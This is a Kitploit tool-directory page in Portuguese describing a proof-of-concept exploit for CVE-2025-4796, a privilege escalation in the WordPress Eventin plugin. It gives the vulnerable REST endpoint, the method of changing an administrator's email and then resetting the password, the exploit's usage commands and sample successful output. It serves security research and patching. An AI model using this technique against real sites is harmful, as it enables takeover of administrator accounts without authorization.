Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - Autenticado (Colaborador+) Escalação de Privilégios via Alteração de E-mail do Usuário/Assunção de Conta | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-4796
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - Autenticado (Colaborador+) Escalação de Privilégios via Alteração de E-mail do Usuário/Assunção de Conta

Ver Repositório
3há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-4796

Eventin <= 4.0.34 - Escalação de Privilégios Autenticada (Contribuidor+) via Alteração de E-mail do Usuário/Assunção de Conta

🛡️ Eventin <= 4.0.34 - Escalação de Privilégios Autenticada (Contribuidor+) (CVE-2025-4796)

📌 Visão Geral

Este repositório documenta uma vulnerabilidade de escalação de privilégios no plugin Eventin do WordPress (<= 4.0.34) que permite a um usuário autenticado com capacidades de Contribuidor+ alterar os endereços de e-mail de usuários arbitrários por meio da API de atualização de palestrantes do plugin. Ao alterar o e-mail de um administrador, um atacante pode acionar uma redefinição de senha e obter a assunção da conta.

  • Componente vulnerável: plugin Eventin do WordPress (Eventin\Speaker\Api\SpeakerController::update_item)

  • Versões afetadas: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (Alta)

  • Instalações ativas: 10,000+

⚠️ Detalhes da Vulnerabilidade

O Eventin não valida corretamente a identidade ou as capacidades do chamador antes de atualizar os detalhes do palestrante/usuário (especificamente o e-mail). Um atacante autenticado como contribuidor (ou superior) pode alterar o endereço de e-mail de outros usuários — incluindo administradores — usando o endpoint REST do plugin:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

Depois que o e-mail é alterado para um endereço controlado pelo atacante, o fluxo padrão de redefinição de senha do WordPress pode ser usado para assumir a conta.

🧰 Script (PoC)

Arquivo: CVE-2025-4796.py

Este script automatiza as etapas:

  1. Faça login no site WordPress de destino usando as credenciais fornecidas.
  2. Extraia o X-WP-Nonce necessário
  3. Envie uma solicitação PUT para /wp-json/eventin/v2/speakers/<speaker_id> para atualizar o e-mail do palestrante.
  4. Exiba e formate a resposta JSON e uma mensagem de sucesso profissional.

Requisitos:

  • Python 3.8+
  • requests

Instalação:

root@kitploit:~
pip install requests

🚀 Uso

Execute o script pela linha de comando:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

Exibir ajuda do script:

root@kitploit:~
python CVE-2025-4796.py -h

📝 Opções da CLI (ajuda)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ Exemplo de Saída Bem-sucedida

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ Divulgação Responsável e Aviso Legal

  • Este repositório é fornecido para fins de pesquisa em segurança, testes e defesa.
  • Não use estas técnicas contra sistemas que você não possui ou para os quais não tem autorização explícita para testar.
  • A exploração não autorizada de vulnerabilidades é ilegal e antiética.
  • Se você é proprietário de um site e acredita que está vulnerável, atualize o Eventin para a versão mais recente ou aplique imediatamente os patches do fornecedor.
  • Use este código apenas em ambientes autorizados (laboratório, teste de penetração aprovado pelo cliente ou com permissão explícita).

🧾 O que o script faz (de forma concisa)

  • Valida entradas (URL, e-mail) e normaliza o esquema da URL.
  • Desativa avisos de SSL (opcional; usado para suportar testes contra instâncias de desenvolvimento autossinadas).
  • Faz login usando as credenciais WP fornecidas e valida o login via cookies.
  • Obtém o X-WP-Nonce da página de administração.
  • Envia uma solicitação PUT autenticada para atualizar o e-mail do palestrante.
  • Exibe a resposta JSON formatada e um resumo final de sucesso legível.

👤 Créditos

Por: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

Baixar ferramenta